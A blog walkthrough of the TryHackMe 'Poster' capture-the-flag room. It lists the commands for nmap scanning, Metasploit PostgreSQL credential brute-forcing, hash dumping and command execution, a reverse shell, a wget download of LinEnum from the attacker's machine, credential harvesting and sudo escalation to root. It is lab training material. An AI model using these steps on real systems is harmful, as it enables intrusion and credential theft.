Try Hack Me: Poster

The skills to be tested and needed to solve this room are: rdbms, postgressql, nmap, Metaspolit, privilege escalation, SSH, find and enumeration.

This room was released today, 9/11/2020. Shout-out to the room creator, @stuxnet. You can access the room at https://tryhackme.com/roomposter

I was assigned a target IP address of 10.10.66.128. You will be assigned a different IP address, so double check your entries when following this walk-through.

The requirements to complete this room are:

  • What is the rdbms installed on the server?
    • p*********
  • What port is the rdbms running on?
    • 5***
  • Metasploit contains a variety of modules that can be used to enumerate in multiple rdbms, making it easy to gather valuable information.
    • No answer needed
  • After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?
    • auxiliary/s******/p*******/p*******_*****
  • What are the credentials you found?
    • p*******:p*******
  • What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
    • auxiliary/a****/p*******/p*******_***
  • Based on the results of #6, what is the rdbms version installed on the server?
    • 9.*.**
  • What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
    • auxiliary/s******/p*******/p*******_********
  • How many user hashes does the module dump?
    • *
  • What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
    • auxiliary/a****/p*******/p*******_********
  • What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
    • exploit/m****/p*******/p*******_****_****_*******_***_****
  • Compromise the machine and locate user.txt
    • THM{p*********_****_************n}
  • Escalate privileges and obtain root.txt
    • THM{c*******_***_****_***_****_****_**********s}

Steps:

  1. Scan the machine using nmap. Type nmap -sC -sV 10.10.66.128
  • -sC – to scan using the default nmap scripts
  • -sV – to pull version information of open ports found during the scan
nmap scan result

The screenshot above answers the following questions:

  • What is the rdbms installed on the server?
    • p*********
  • What port is the rdbms running on?
    • 5***

2. Start Metasploit by typing msfconsole

3. Search for an associated auxiliary module that allows us to enumerate user credentials. Type grep auxiliary search postgres

  • grep auxiliary – we want to specifically grab modules that has the word auxiliary in it
  • search postgres – now that we know that we are working on postgresql, it just makes sense to look for postgres modules

The screenshot above answers the question below. Since we are being asked about “user credentials”, it makes sense to pick the module used for PostgreSQL login utility:

  • Search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the module?
    • auxiliary/s******/p*******/p*******_*****

4. To use the module, type use 7 and hit enter

5. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Then type run to start the the scan

credentials found

The screenshot above answers the next question:

  • What are the credentials found?
    • p*******:p*******

6. Search for a module that allows you to execute commands with proper user credentials. What is the full path of the module? Type grep auxiliary search postgres

The screenshot above answers the question below:

  • What is the full path of the module that allows you to execute commands with proper user credentials?
    • auxiliary/a****/p*******/p*******_***

7. To use the module, type use 3 and hit enter

8. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Next type, set PASSWORD p*******. Then type run to start the the scan

The screenshot above answers the next question:

  • Based on the results of #6, what is the rdbms version installed on the server?
    • 9.*.**

9. Search for a module that allows for dumping user hashes. What is the full path of the module? Type grep auxiliary search postgres

The screenshot above answers the next question:

  • What is the full path of the module that allows for dumping user hashes?
    • auxiliary/s******/p*******/p*******_********

10. To use the module, type use 6 and hit enter

11. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Next type, set PASSWORD p*******. Then type run to start the the scan

The screenshot above answers the next question:

  • How many user hashes does the module dump?
    • *

12. Search for a module that allows authenticated user to view files of their choosing on the server. What is the full path of the module? Type grep auxiliary search postgres

13. Search for an exploit that allows arbitrary command execution with the proper user credentials. What is the full path of the module? Type grep exploit search postgres

14. To use the module, type, use 13

15. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Type LHOST 10.2.5.154 and hit enter. Remember, for the LHOST, use the IP address of your VPN network adapter, most likely tun0 adapter. Next type, set PASSWORD p*******. Then type exploit to start the the scan

And we have initial foothold!

16. Transfer LinEnum.sh to the victim machine. First, from our attack machine start our local web server by typing python3 -m http.server 9000

17. On the victim machine, let’s download the LinEnum.sh by typing wget http://10.2.5.154:9000/LinEnum.sh Remember to use your attack machine’s IP address to download the file

18. Run LinEnum.sh by typing ./LinEnum.sh and hit enter. There are two files that caught my attention. First was /home/dark/credentials.txt and /var/www/html/config.php. The credentials.txt contains a valid credential but it was a deadend, but the config.php file contains user credential to read user.txt

This was a rabbit hole
Valid credentials found

19. SSH to the server using the credentials found from config.php file. Type ssh a*****@10.10.66.128 hit enter and then supply the password

20. Find the user.txt by typing find / -type f -name user.txt 2> /dev/null

User flag location found!

21. Open the file by typing cat /home/a*****/user.txt

User flag!

22. Escalate our privilege to root by typing sudo -l to see what our current user is capable of running with sudo privileges

The screenshot above is telling us that the current user is authorized to execute all commands. This is bad configuration.

23. To escalate our privilege, just type sudo su to switch user as root

Now, we are root!

24. To retrieve the root flag, type cat root.txt

Root flag!

Hope you enjoyed following my walk-through. Please don’t forget to subscribe to my blog.

Published by lightkunyagami

https://tryhackme.com/badge/18276

Join the Conversation

1 Comment

Leave a comment

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: